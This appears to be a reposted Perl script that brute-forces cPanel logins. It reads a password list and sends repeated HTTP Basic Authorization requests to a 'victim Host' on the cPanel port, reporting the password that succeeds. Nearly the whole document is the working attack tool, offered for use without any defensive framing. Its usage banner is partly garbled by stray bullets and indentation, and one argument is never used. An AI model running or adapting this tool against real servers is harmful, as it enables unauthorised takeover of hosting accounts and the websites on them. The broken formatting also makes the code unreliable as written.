Cpanel Password Brute Forcer

[Noctambulaar]

#!/usr/bin/perl

# Cpanel Password Brute Forcer

# ----------------------------

# ©oded By Hessam-x

# Perl Version ( low speed )

# Oerginal Advisory :

# http://www.simorgh-ev.com/advisory/2006/cp...ruteforce-vule/

use IO::Socket;

use LWP::Simple;

use MIME::Base64;



$host = $ARGV[0];

$user = $ARGV[1];

$port = $ARGV[2];

$list = $ARGV[3];

$file = $ARGV[4];

$url = "http://".$host.":".$port;

if(@ARGV < 3){

print q(

###############################################################

# Cpanel Password Brute Force Tool #

###############################################################

# usage : cpanel.pl [HOST] [User] [PORT]

• [File] #
  
  #-------------------------------------------------------------#
  
  # [Host] : victim Host (simorgh-ev.com) #
  
  # [User] : User Name (demo) #
  
  # [PORT] : Port of Cpanel (2082) #
  
  #
  • : File Of password list (list.txt) #
    
    # [File] : file for save password (password.txt) #
    
    # #
    
    ###############################################################
    
    # &copy;oded By Hessam-x / simorgh-ev.com #
    
    ###############################################################
    
    );exit;}
    
    
    
    headx();
    
    
    
    $numstart = "-1";
    
    
    
    sub headx() {
    
    print q(
    
    ###############################################################
    
    # Cpanel Password Brute Force Tool #
    
    # &copy;oded By Hessam-x / simorgh-ev.com #
    
    ###############################################################
    
    );
    
    open (PASSFILE, "<$list") || die "[ - ] Can't open the List of password file !";
    
    @PASSWORDS = <PASSFILE>;
    
    close PASSFILE;
    
    foreach my $P (@PASSWORDS) {
    
    chomp $P;
    
    $passwd = $P;
    
    print "\n [~] Try Password : $passwd \n";
    
    &brut;
    
    };
    
    }
    
    sub brut() {
    
    $authx = encode_base64($user.":".$passwd);
    
    print $authx;
    
    my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n [ - ] Can not connect to the host";
    
    print $sock "GET / HTTP/1.1\n";
    
    print $sock "Authorization: Basic $authx\n";
    
    print $sock "Connection: Close\n\n";
    
    read $sock, $answer, 128;
    
    close($sock);
    
    
    
    if ($answer =~ /Moved/) {
    
    print "\n [~] PASSWORD FOUND : $passwd \n";
    
    exit();
    
    }
    
    }